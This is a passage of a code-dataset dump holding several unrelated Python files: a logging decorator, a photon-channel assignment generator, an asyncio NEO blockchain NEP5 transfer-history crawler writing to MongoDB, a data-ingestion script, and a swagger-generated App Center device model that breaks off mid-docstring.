cmap='rainbow')\n\nplt.show()","sub_path":"drawtest/matplotlib/Axes3D_surface.py","file_name":"Axes3D_surface.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"60318083","text":"import logging\nfrom functools import wraps\n\n\ndef is_continue():\n temp = input('Do you want to continue? ').lower()\n return temp in ['yes', 'y']\n\n\ndef log(func):\n @wraps(func)\n def timed(*args, **kw):\n logger = logging.getLogger(func.__name__)\n logger.setLevel(logging.DEBUG)\n fh = logging.FileHandler('{}.log'.format(func.__name__))\n fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n formatter = logging.Formatter(fmt)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n for item in args:\n logger.debug('arg - {}'.format(item))\n result = func(*args, **kw)\n logger.info(' result - {}'.format(result))\n return result\n\n return timed\n\n\ndef get_params(value):\n result = ''.join(value)\n result = result.split(',')\n return result\n","sub_path":"Task4_File_Parser/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"580491275","text":"def photon_number_to_channels(photons, filter_afterpulsing=True):\n \"\"\"\n Given a stream of photons, assign each photon to a channel which indicates\n the numer of photons which arrived after a given pulse of excitation, and\n the order in which those photon arrived. By default, each channel may\n only produce a single photon per pulse, but this behavior may be\n suppressed by setting filter_afterpulsing to False.\n \"\"\"\n def emit_queue(queue):\n n_photons = len(queue)\n channel = n_photons*(n_photons-1)//2\n for photon in queue:\n photon.channel = channel\n yield(photon)\n channel += 1\n\n queue = list()\n \n for photon in photons:\n if len(queue) == 0:\n queue.append(photon)\n elif photon.pulse == queue[0].pulse:\n if filter_afterpulsing and \\\n any(map(lambda other: photon.channel == other.channel, queue)):\n # Ignore any subsequent photon on a given channel, as these\n # are more likely to be afterpulsing than true events\n continue\n else:\n queue.append(photon)\n else:\n for result in emit_queue(queue):\n yield(result)\n\n queue.clear()\n queue.append(photon) \n","sub_path":"photon_correlation_examples/photon_number_to_channels.py","file_name":"photon_number_to_channels.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"155177497","text":"#! /usr/bin/env python3\n# coding: utf-8\n# flow@蓝鲸淘\n# Licensed under the MIT License.\n\nimport sys\nimport math\nimport uvloop\nimport asyncio\nimport aiohttp\nimport datetime\nimport binascii\nimport hashlib\nfrom base58 import b58encode\nimport motor.motor_asyncio\nfrom logzero import logger\nfrom decimal import Decimal as D\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\nfrom Config import Config as C\nfrom CommonTool import CommonTool as CT\n\n\nclass Crawler:\n def __init__(self, mongo_uri, mongo_db, neo_uri, loop, tasks='1000'):\n self.client = motor.motor_asyncio.AsyncIOMotorClient(mongo_uri)\n self.state = self.client[mongo_db].state\n self.nep5history = self.client[mongo_db].nep5history\n self.max_tasks = int(tasks)\n self.neo_uri = neo_uri\n self.processing = []\n self.cache = {}\n self.cache_log = {}\n self.cache_decimals = {}\n conn = aiohttp.TCPConnector(limit=10000)\n self.session = aiohttp.ClientSession(loop=loop,connector=conn)\n self.net = C.get_net()\n self.super_node_uri = C.get_super_node()\n\n def hex_to_num_str(self, fixed8_str, decimals=8):\n hex_str = CT.big_or_little(fixed8_str)\n if not hex_str: return '0'\n d = D(int('0x' + hex_str, 16))\n return CT.sci_to_str(str(d/D(math.pow(10, decimals))))\n\n @staticmethod\n def hash256(b):\n return hashlib.sha256(hashlib.sha256(b).digest()).digest()\n\n @classmethod\n def scripthash_to_address(cls, sh):\n tmp = binascii.unhexlify('17' + sh)\n result = b58encode(tmp + cls.hash256(tmp)[:4])\n if isinstance(result, bytes): result = result.decode('utf8')\n return result\n\n async def get_invokefunction(self, contract, func):\n async with self.session.post(self.neo_uri,\n json={'jsonrpc':'2.0','method':'invokefunction','params':[contract, func],'id':1}) as resp:\n if 200 != resp.status:\n logger.error('Unable to get invokefunction')\n sys.exit(1)\n j = await resp.json()\n return j['result']\n\n async def get_decimals(self, contract):\n d = await self.get_invokefunction(contract, 'decimals')\n if 'state' in d.keys() and d['state'].startswith('HALT') and d['stack'][0]['value']:\n return int(d['stack'][0]['value'])\n return 8\n\n async def get_cache_decimals(self, contract):\n if contract not in self.cache_decimals.keys():\n self.cache_decimals[contract] = await self.get_decimals(contract)\n return self.cache_decimals[contract]\n\n async def get_block(self, height):\n async with self.session.post(self.neo_uri, json={'jsonrpc':'2.0','method':'getblock','params':[height,1],'id':1}) as resp:\n if 200 != resp.status:\n logger.error('Unable to fetch block {}'.format(height))\n sys.exit(1)\n j = await resp.json()\n return j['result']\n\n async def get_block_count(self):\n async with self.session.post(self.neo_uri,\n json={'jsonrpc':'2.0','method':'getblockcount','params':[],'id':1}) as resp:\n if 200 != resp.status:\n logger.error('Unable to fetch blockcount')\n sys.exit(1)\n j = await resp.json()\n return j['result']\n\n async def get_history_state(self):\n start = -1\n if 'mainnet' == self.net: start = 1444800\n if 'testnet' == self.net: start = 442400\n result = await self.state.find_one({'_id':'nep5history'})\n if not result:\n await self.state.insert_one({'_id':'nep5history','value':start})\n return start\n else:\n return result['value']\n\n async def update_history_state(self, height):\n await self.state.update_one({'_id':'nep5history'}, {'$set': {'value':height}}, upsert=True)\n\n async def cache_block(self, height):\n self.cache[height] = await self.get_block(height)\n\n async def cache_applicationlog(self, txid):\n url = self.super_node_uri + '/' + self.net + '/log/' + txid\n async with self.session.get(url, timeout=120) as resp:\n if 200 != resp.status:\n logger.error('Visit %s get status %s' % (url, resp.status))\n return None\n j = await resp.json()\n if 'error' in j.keys():\n logger.error('Visit %s return error %s' % (url, j['error']))\n return None\n self.cache_log[txid] = j\n\n async def update_a_vin(self, asset, txid, index, address, value, utc_time):\n _id = txid + str(index) + '_in_'\n try:\n await self.nep5history.update_one({'_id':_id},\n {'$set':{\n 'txid':txid,\n 'time':utc_time,\n 'address':address,\n 'asset':asset,\n 'value':value,\n 'operation':'out'\n }},upsert=True)\n except Exception as e:\n logger.error('Unable to update a vin %s:%s' % (_id,e))\n sys.exit(1)\n\n async def update_a_vout(self, asset, txid, index, address, value, utc_time):\n _id = txid + str(index) + '_out_'\n try:\n await self.nep5history.update_one({'_id':_id},\n {'$set':{\n 'txid':txid,\n 'time':utc_time,\n 'address':address,\n 'asset':asset,\n 'value':value,\n 'operation':'in'\n }},upsert=True)\n except Exception as e:\n logger.error('Unable to update a vout %s:%s' % (_id,e))\n sys.exit(1)\n\n def timestamp_to_utc(self, timestamp):\n return datetime.datetime.utcfromtimestamp(timestamp)\n\n async def crawl(self):\n self.start = await self.get_history_state()\n self.start += 1\n\n while True:\n current_height = await self.get_block_count()\n time_a = CT.now()\n if self.start < current_height:\n stop = self.start + self.max_tasks\n if stop >= current_height:\n stop = current_height\n self.processing.extend([i for i in range(self.start,stop)])\n max_height = max(self.processing)\n min_height = self.processing[0]\n await asyncio.wait([self.cache_block(h) for h in self.processing])\n if self.processing != sorted(self.cache.keys()):\n msg = 'cache != processing'\n logger.error(msg)\n sys.exit(1)\n txids = [] \n for block in self.cache.values():\n for tx in block['tx']:\n if 'InvocationTransaction' == tx['type']:\n txids.append(tx['txid'])\n if txids:\n await asyncio.wait([self.cache_applicationlog(txid) for txid in txids])\n if sorted(txids) != sorted(self.cache_log.keys()):\n msg = 'cache log error'\n logger.error(msg)\n sys.exit(1)\n\n #await asyncio.wait([self.add_nep5_history(log) for log in self.cache.values()])\n vins = [] #froms\n vouts = [] #tos\n for block in self.cache.values():\n block_time = block['time']\n for tx in block['tx']:\n txid = tx['txid']\n if 'InvocationTransaction' == tx['type']:\n log = self.cache_log[txid]\n if 'HALT, BREAK' == log['vmstate']:\n for i in range(len(log['notifications'])):\n n = log['notifications'][i]\n asset = n['contract'][2:]\n if 'value' in n['state'].keys() and \\\n isinstance(n['state']['value'],list) and \\\n 4 == len(n['state']['value']) and \\\n '7472616e73666572' == n['state']['value'][0]['value']:\n value = self.hex_to_num_str(n['state']['value'][3]['value'], decimals=await self.get_cache_decimals(asset))\n from_sh = n['state']['value'][1]['value']\n if from_sh:\n from_address = self.scripthash_to_address(from_sh)\n vins.append([asset, txid, i, from_address, value, block_time])\n to_sh = n['state']['value'][2]['value']\n to_address = self.scripthash_to_address(to_sh)\n vouts.append([asset, txid, i, to_address, value, block_time])\n \n if vins:\n await asyncio.wait([self.update_a_vin(*vin) for vin in vins])\n if vouts:\n await asyncio.wait([self.update_a_vout(*vout) for vout in vouts])\n\n time_b = CT.now()\n logger.info('reached %s ,cost %.6fs to sync %s blocks ,total cost: %.6fs' % \n (max_height, time_b-time_a, stop-self.start, time_b-START_TIME))\n await self.update_history_state(max_height)\n self.start = max_height + 1\n del self.processing\n del self.cache\n del self.cache_log\n self.processing = []\n self.cache = {}\n self.cache_log = {}\n else:\n await asyncio.sleep(0.5)\n\n\nif __name__ == \"__main__\":\n START_TIME = CT.now()\n logger.info('STARTING...')\n mongo_uri = C.get_mongo_uri()\n neo_uri = C.get_neo_uri()\n mongo_db = C.get_mongo_db()\n tasks = C.get_tasks()\n loop = asyncio.get_event_loop()\n crawler = Crawler(mongo_uri, mongo_db, neo_uri, loop, tasks)\n loop.run_until_complete(crawler.crawl())\n '''\n try:\n loop.run_until_complete(crawler.crawl())\n except Exception as e:\n logger.error('LOOP EXCEPTION: %s' % e)\n finally:\n loop.close()\n '''\n","sub_path":"src/nep5history.py","file_name":"nep5history.py","file_ext":"py","file_size_in_byte":10444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"143373310","text":"import os\nfrom configparser import ConfigParser\nfrom utils.database import db\nfrom services.sqlIngest import DataHandler\n\n\nif __name__ == '__main__':\n config = ConfigParser()\n settings_file = os.path.join(os.getcwd(), 'settings.cfg')\n config.read(settings_file)\n\n db.config(config['Database'])\n loader = DataHandler(config)\n ingestion = config['Ingestion']\n\n years = [int(year) for year in ingestion['YEARS'].split(',')]\n limit = int(ingestion['LIMIT'])\n querySize = int(ingestion['QUERY_SIZE'])\n\n querySize = min([limit, querySize])\n\n loader.populateDatabase(years, limit, querySize)\n","sub_path":"server/src/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"448172111","text":"# coding: utf-8\n\n\"\"\"\n App Center Client\n\n Microsoft Visual Studio App Center API # noqa: E501\n\n OpenAPI spec version: preview\n Contact: benedetto.abbenanti@gmail.com\n Project Repository: https://github.com/b3nab/appcenter-sdks\n\"\"\"\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass LogFlowDevice(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'sdk_name': 'string',\n 'sdk_version': 'string',\n 'wrapper_sdk_version': 'string',\n 'wrapper_sdk_name': 'string',\n 'model': 'string',\n 'oem_name': 'string',\n 'os_name': 'string',\n 'os_version': 'string',\n 'os_build': 'string',\n 'os_api_level': 'integer',\n 'locale': 'string',\n 'time_zone_offset': 'integer',\n 'screen_size': 'string',\n 'app_version': 'string',\n 'carrier_name': 'string',\n 'carrier_code': 'string',\n 'carrier_country': 'string',\n 'app_build': 'string',\n 'app_namespace': 'string',\n 'live_update_release_label': 'string',\n 'live_update_deployment_key': 'string',\n 'live_update_package_hash': 'string',\n 'wrapper_runtime_version': 'string'\n }\n\n attribute_map = {\n 'sdk_name': 'sdk_name',\n 'sdk_version': 'sdk_version',\n 'wrapper_sdk_version': 'wrapper_sdk_version',\n 'wrapper_sdk_name': 'wrapper_sdk_name',\n 'model': 'model',\n 'oem_name': 'oem_name',\n 'os_name': 'os_name',\n 'os_version': 'os_version',\n 'os_build': 'os_build',\n 'os_api_level': 'os_api_level',\n 'locale': 'locale',\n 'time_zone_offset': 'time_zone_offset',\n 'screen_size': 'screen_size',\n 'app_version': 'app_version',\n 'carrier_name': 'carrier_name',\n 'carrier_code': 'carrier_code',\n 'carrier_country': 'carrier_country',\n 'app_build': 'app_build',\n 'app_namespace': 'app_namespace',\n 'live_update_release_label': 'live_update_release_label',\n 'live_update_deployment_key': 'live_update_deployment_key',\n 'live_update_package_hash': 'live_update_package_hash',\n 'wrapper_runtime_version': 'wrapper_runtime_version'\n }\n\n def __init__(self, sdk_name=None, sdk_version=None, wrapper_sdk_version=None, wrapper_sdk_name=None, model=None, oem_name=None, os_name=None, os_version=None, os_build=None, os_api_level=None, locale=None, time_zone_offset=None, screen_size=None, app_version=None, carrier_name=None, carrier_code=None, carrier_country=None, app_build=None, app_namespace=None, live_update_release_label=None, live_update_deployment_key=None, live_update_package_hash=None, wrapper_runtime_version=None): # noqa: E501\n \"\"\"LogFlowDevice - a model defined in Swagger\"\"\" # noqa: E501\n self._sdk_name = None\n self._sdk_version = None\n self._wrapper_sdk_version = None\n self._wrapper_sdk_name = None\n self._model = None\n self._oem_name = None\n self._os_name = None\n self._os_version = None\n self._os_build = None\n self._os_api_level = None\n self._locale = None\n self._time_zone_offset = None\n self._screen_size = None\n self._app_version = None\n self._carrier_name = None\n self._carrier_code = None\n self._carrier_country = None\n self._app_build = None\n self._app_namespace = None\n self._live_update_release_label = None\n self._live_update_deployment_key = None\n self._live_update_package_hash = None\n self._wrapper_runtime_version = None\n self.discriminator = None\n self.sdk_name = sdk_name\n self.sdk_version = sdk_version\n if wrapper_sdk_version is not None:\n self.wrapper_sdk_version = wrapper_sdk_version\n if wrapper_sdk_name is not None:\n self.wrapper_sdk_name = wrapper_sdk_name\n if model is not None:\n self.model = model\n if oem_name is not None:\n self.oem_name = oem_name\n self.os_name = os_name\n self.os_version = os_version\n if os_build is not None:\n self.os_build = os_build\n if os_api_level is not None:\n self.os_api_level = os_api_level\n self.locale = locale\n self.time_zone_offset = time_zone_offset\n if screen_size is not None:\n self.screen_size = screen_size\n self.app_version = app_version\n if carrier_name is not None:\n self.carrier_name = carrier_name\n if carrier_code is not None:\n self.carrier_code = carrier_code\n if carrier_country is not None:\n self.carrier_country = carrier_country\n self.app_build = app_build\n if app_namespace is not None:\n self.app_namespace = app_namespace\n if live_update_release_label is not None:\n self.live_update_release_label = live_update_release_label\n if live_update_deployment_key is not None:\n self.live_update_deployment_key = live_update_deployment_key\n if live_update_package_hash is not None:\n self.live_update_package_hash = live_update_package_hash\n if wrapper_runtime_version is not None:\n self.wrapper_runtime_version = wrapper_runtime_version\n\n @property\n def sdk_name(self):\n \"\"\"Gets the sdk_name of this LogFlowDevice. # noqa: E501\n\n Name of the SDK. Consists of the name of the SDK and the platform, e.g. \"appcenter.ios\", \"hockeysdk.android\".\n # noqa: E501\n\n :return: The sdk_name of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._sdk_name\n\n @sdk_name.setter\n def sdk_name(self, sdk_name):\n \"\"\"Sets the sdk_name of this LogFlowDevice.\n\n Name of the SDK. Consists of the name of the SDK and the platform, e.g. \"appcenter.ios\", \"hockeysdk.android\".\n # noqa: E501\n\n :param sdk_name: The sdk_name of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if sdk_name is None:\n raise ValueError(\"Invalid value for `sdk_name`, must not be `None`\") # noqa: E501\n\n self._sdk_name = sdk_name\n\n @property\n def sdk_version(self):\n \"\"\"Gets the sdk_version of this LogFlowDevice. # noqa: E501\n\n Version of the SDK in semver format, e.g. \"1.2.0\" or \"0.12.3-alpha.1\".\n # noqa: E501\n\n :return: The sdk_version of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._sdk_version\n\n @sdk_version.setter\n def sdk_version(self, sdk_version):\n \"\"\"Sets the sdk_version of this LogFlowDevice.\n\n Version of the SDK in semver format, e.g. \"1.2.0\" or \"0.12.3-alpha.1\".\n # noqa: E501\n\n :param sdk_version: The sdk_version of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if sdk_version is None:\n raise ValueError(\"Invalid value for `sdk_version`, must not be `None`\") # noqa: E501\n\n self._sdk_version = sdk_version\n\n @property\n def wrapper_sdk_version(self):\n \"\"\"Gets the wrapper_sdk_version of this LogFlowDevice. # noqa: E501\n\n Version of the wrapper SDK in semver format. When the SDK is embedding another base SDK (for example Xamarin.Android wraps Android), the Xamarin specific version is populated into this field while sdkVersion refers to the original Android SDK.\n # noqa: E501\n\n :return: The wrapper_sdk_version of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._wrapper_sdk_version\n\n @wrapper_sdk_version.setter\n def wrapper_sdk_version(self, wrapper_sdk_version):\n \"\"\"Sets the wrapper_sdk_version of this LogFlowDevice.\n\n Version of the wrapper SDK in semver format. When the SDK is embedding another base SDK (for example Xamarin.Android wraps Android), the Xamarin specific version is populated into this field while sdkVersion refers to the original Android SDK.\n # noqa: E501\n\n :param wrapper_sdk_version: The wrapper_sdk_version of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._wrapper_sdk_version = wrapper_sdk_version\n\n @property\n def wrapper_sdk_name(self):\n \"\"\"Gets the wrapper_sdk_name of this LogFlowDevice. # noqa: E501\n\n Name of the wrapper SDK. Consists of the name of the SDK and the wrapper platform, e.g. \"appcenter.xamarin\", \"hockeysdk.cordova\".\n # noqa: E501\n\n :return: The wrapper_sdk_name of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._wrapper_sdk_name\n\n @wrapper_sdk_name.setter\n def wrapper_sdk_name(self, wrapper_sdk_name):\n \"\"\"Sets the wrapper_sdk_name of this LogFlowDevice.\n\n Name of the wrapper SDK. Consists of the name of the SDK and the wrapper platform, e.g. \"appcenter.xamarin\", \"hockeysdk.cordova\".\n # noqa: E501\n\n :param wrapper_sdk_name: The wrapper_sdk_name of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._wrapper_sdk_name = wrapper_sdk_name\n\n @property\n def model(self):\n \"\"\"Gets the model of this LogFlowDevice. # noqa: E501\n\n Device model (example: iPad2,3).\n # noqa: E501\n\n :return: The model of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._model\n\n @model.setter\n def model(self, model):\n \"\"\"Sets the model of this LogFlowDevice.\n\n Device model (example: iPad2,3).\n # noqa: E501\n\n :param model: The model of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._model = model\n\n @property\n def oem_name(self):\n \"\"\"Gets the oem_name of this LogFlowDevice. # noqa: E501\n\n Device manufacturer (example: HTC).\n # noqa: E501\n\n :return: The oem_name of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._oem_name\n\n @oem_name.setter\n def oem_name(self, oem_name):\n \"\"\"Sets the oem_name of this LogFlowDevice.\n\n Device manufacturer (example: HTC).\n # noqa: E501\n\n :param oem_name: The oem_name of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._oem_name = oem_name\n\n @property\n def os_name(self):\n \"\"\"Gets the os_name of this LogFlowDevice. # noqa: E501\n\n OS name (example: iOS). The following OS names are standardized (non-exclusive): Android, iOS, macOS, tvOS, Windows.\n # noqa: E501\n\n :return: The os_name of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._os_name\n\n @os_name.setter\n def os_name(self, os_name):\n \"\"\"Sets the os_name of this LogFlowDevice.\n\n OS name (example: iOS). The following OS names are standardized (non-exclusive): Android, iOS, macOS, tvOS, Windows.\n # noqa: E501\n\n :param os_name: The os_name of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if os_name is None:\n raise ValueError(\"Invalid value for `os_name`, must not be `None`\") # noqa: E501\n\n self._os_name = os_name\n\n @property\n def os_version(self):\n \"\"\"Gets the os_version of this LogFlowDevice. # noqa: E501\n\n OS version (example: 9.3.0).\n # noqa: E501\n\n :return: The os_version of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._os_version\n\n @os_version.setter\n def os_version(self, os_version):\n \"\"\"Sets the os_version of this LogFlowDevice.\n\n OS version (example: 9.3.0).\n # noqa: E501\n\n :param os_version: The os_version of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if os_version is None:\n raise ValueError(\"Invalid value for `os_version`, must not be `None`\") # noqa: E501\n\n self._os_version = os_version\n\n @property\n def os_build(self):\n \"\"\"Gets the os_build of this LogFlowDevice. # noqa: E501\n\n OS build code (example: LMY47X).\n # noqa: E501\n\n :return: The os_build of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._os_build\n\n @os_build.setter\n def os_build(self, os_build):\n \"\"\"Sets the os_build of this LogFlowDevice.\n\n OS build code (example: LMY47X).\n # noqa: E501\n\n :param os_build: The os_build of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._os_build = os_build\n\n @property\n def os_api_level(self):\n \"\"\"Gets the os_api_level of this LogFlowDevice. # noqa: E501\n\n API level when applicable like in Android (example: 15).\n # noqa: E501\n\n :return: The os_api_level of this LogFlowDevice. # noqa: E501\n :rtype: integer\n \"\"\"\n return self._os_api_level\n\n @os_api_level.setter\n def os_api_level(self, os_api_level):\n \"\"\"Sets the os_api_level of this LogFlowDevice.\n\n API level when applicable like in Android (example: 15).\n # noqa: E501\n\n :param os_api_level: The os_api_level of this LogFlowDevice. # noqa: E501\n :type: integer\n \"\"\"\n\n self._os_api_level = os_api_level\n\n @property\n def locale(self):\n \"\"\"Gets the locale of this LogFlowDevice. # noqa: E501\n\n Language code (example: en_US).\n # noqa: E501\n\n :return: The locale of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._locale\n\n @locale.setter\n def locale(self, locale):\n \"\"\"Sets the locale of this LogFlowDevice.\n\n Language code (example: en_US).\n # noqa: E501\n\n :param locale: The locale of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if locale is None:\n raise ValueError(\"Invalid value for `locale`, must not be `None`\") # noqa: E501\n\n self._locale = locale\n\n @property\n def time_zone_offset(self):\n \"\"\"Gets the time_zone_offset of this LogFlowDevice. # noqa: E501\n\n The offset in minutes from UTC for the device time zone, including daylight savings time.\n # noqa: E501\n\n :return: The time_zone_offset of this LogFlowDevice. # noqa: E501\n :rtype: integer\n \"\"\"\n return self._time_zone_offset\n\n @time_zone_offset.setter\n def time_zone_offset(self, time_zone_offset):\n \"\"\"Sets the time_zone_offset of this LogFlowDevice.\n\n The offset in minutes from UTC for the device time zone, including daylight savings time.\n # noqa: E501\n\n :param time_zone_offset: The time_zone_offset of this LogFlowDevice. # noqa: E501\n :type: integer\n \"\"\"\n if time_zone_offset is None:\n raise ValueError(\"Invalid value for `time_zone_offset`, must not be `None`\") # noqa: E501\n\n self._time_zone_offset = time_zone_offset\n\n @property\n def screen_size(self):\n \"\"\"Gets the screen_size of this LogFlowDevice. # noqa: E501\n\n Screen size of the device in pixels (example: 640x480).\n # noqa: E501\n\n :return: The screen_size of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._screen_size\n\n @screen_size.setter\n def screen_size(self, screen_size):\n \"\"\"Sets the screen_size of this LogFlowDevice.\n\n Screen size of the device in pixels (example: 640x480).\n # noqa: E501\n\n :param screen_size: The screen_size of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._screen_size = screen_size\n\n @property\n def app_version(self):\n \"\"\"Gets the app_version of this LogFlowDevice. # noqa: E501\n\n Application version name, e.g. 1.1.0\n # noqa: E501\n\n :return: The app_version of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._app_version\n\n @app_version.setter\n def app_version(self, app_version):\n \"\"\"Sets the app_version of this LogFlowDevice.\n\n Application version name, e.g. 1.1.0\n # noqa: E501\n\n :param app_version: The app_version of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if app_version is None:\n raise ValueError(\"Invalid value for `app_version`, must not be `None`\") # noqa: E501\n\n self._app_version = app_version\n\n @property\n def carrier_name(self):\n \"\"\"Gets the carrier_name of this LogFlowDevice. # noqa: E501\n\n Carrier name (for mobile devices).\n # noqa: E501\n\n :return: The carrier_name of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._carrier_name\n\n @carrier_name.setter\n def carrier_name(self, carrier_name):\n \"\"\"Sets the carrier_name of this LogFlowDevice.\n\n Carrier name (for mobile devices).\n # noqa: E501\n\n :param carrier_name: The carrier_name of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._carrier_name = carrier_name\n\n @property\n def carrier_code(self):\n \"\"\"Gets the carrier_code of this LogFlowDevice. # noqa: E501\n\n Carrier country code (for mobile devices).\n # noqa: E501\n\n :return: The carrier_code of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._carrier_code\n\n @carrier_code.setter\n def carrier_code(self, carrier_code):\n \"\"\"Sets the carrier_code of this LogFlowDevice.\n\n Carrier country code (for mobile devices).\n # noqa: E501\n\n :param carrier_code: The carrier_code of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._carrier_code = carrier_code\n\n @property\n def carrier_country(self):\n \"\"\"Gets the carrier_country of this LogFlowDevice. # noqa: E501\n\n Carrier country.\n # noqa: E501\n\n :return: The carrier_country of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._carrier_country\n\n @carrier_country.setter\n def carrier_country(self, carrier_country):\n \"\"\"Sets the carrier_country of this LogFlowDevice.\n\n Carrier country.\n # noqa: E501\n\n :param carrier_country: The carrier_country of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._carrier_country = carrier_country\n\n @property\n def app_build(self):\n \"\"\"Gets the app_build of this LogFlowDevice. # noqa: E501\n\n The app's build number, e.g. 42.\n # noqa: E501\n\n :return: The app_build of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._app_build\n\n @app_build.setter\n def app_build(self, app_build):\n \"\"\"Sets the app_build of this LogFlowDevice.\n\n The app's build number, e.g. 42.\n # noqa: E501\n\n :param app_build: The app_build of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if app_build is None:\n raise ValueError(\"Invalid value for `app_build`, must not be `None`\") # noqa: E501\n\n self._app_build = app_build\n\n @property\n def app_namespace(self):\n \"\"\"Gets the app_namespace of this LogFlowDevice. # noqa: E501\n\n The bundle identifier, package identifier, or namespace, depending on what the individual plattforms use, .e.g com.microsoft.example.\n # noqa: E501\n\n :return: The app_namespace of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._app_namespace\n\n @app_namespace.setter\n def app_namespace(self, app_namespace):\n \"\"\"Sets the app_namespace of this LogFlowDevice.\n\n The bundle identifier, package identifier, or namespace, depending on what the individual plattforms use, .e.g com.microsoft.example.\n # noqa: E501\n\n :param app_namespace: The app_namespace of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._app_namespace = app_namespace\n\n @property\n def live_update_release_label(self):\n \"\"\"Gets the live_update_release_label of this LogFlowDevice. # noqa: E501\n\n Label that is used to identify application code 'version' released via Live Update beacon running on device\n # noqa: E501\n\n :return: The live_update_release_label of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._live_update_release_label\n\n @live_update_release_label.setter\n def live_update_release_label(self, live_update_release_label):\n \"\"\"Sets the live_update_release_label of this LogFlowDevice.\n\n Label that is used to identify application code 'version' released via Live Update beacon running on device\n # noqa: E501\n\n :param live_update_release_label: The live_update_release_label of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._live_update_release_label = live_update_release_label\n\n @property\n def live_update_deployment_key(self):\n \"\"\"Gets the live_update_deployment_key of this LogFlowDevice. # noqa: E501\n\n Identifier of environment that current application release belongs to, deployment key then maps to environment like Production, Staging.\n # noqa: E501\n\n :return: The live_update_deployment_key of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._live_update_deployment_key\n\n @live_update_deployment_key.setter\n def live_update_deployment_key(self, live_update_deployment_key):\n \"\"\"Sets the live_update_deployment_key of this LogFlowDevice.\n\n Identifier of environment that current application release belongs to, deployment key then maps to environment like Production, Staging.\n # noqa: E501\n\n :param live_update_deployment_key: The live_update_deployment_key of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._live_update_deployment_key = live_update_deployment_key\n\n @property\n def live_update_package_hash(self):\n \"\"\"Gets the live_update_package_hash of this LogFlowDevice. # noqa: E501\n\n Hash of all files (ReactNative or Cordova) deployed to device via LiveUpdate beacon. Helps identify the Release version on device or need to download updates in future.\n # noqa: E501\n\n :return: The live_update_package_hash of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._live_update_package_hash\n\n @live_update_package_hash.setter\n def live_update_package_hash(self, live_update_package_hash):\n \"\"\"Sets the live_update_package_hash of this LogFlowDevice.\n\n Hash of all files (ReactNative or Cordova) deployed to device via LiveUpdate beacon. Helps identify the Release version on device or need to download updates in future.\n # noqa: E501\n\n :param live_update_package_hash: The live_update_package_hash of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._live_update_package_hash = live_update_package_hash\n\n @property\n def wrapper_runtime_version(self):\n \"\"\"Gets the wrapper_runtime_version of this LogFlowDevice. # noqa: E501\n\n Version of the wrapper technology framework (Xamarin runtime version or ReactNative or Cordova etc...). See wrapper_sdk_name to see if this version refers to Xamarin or ReactNative or other.\n # noqa: E501\n\n :return: The 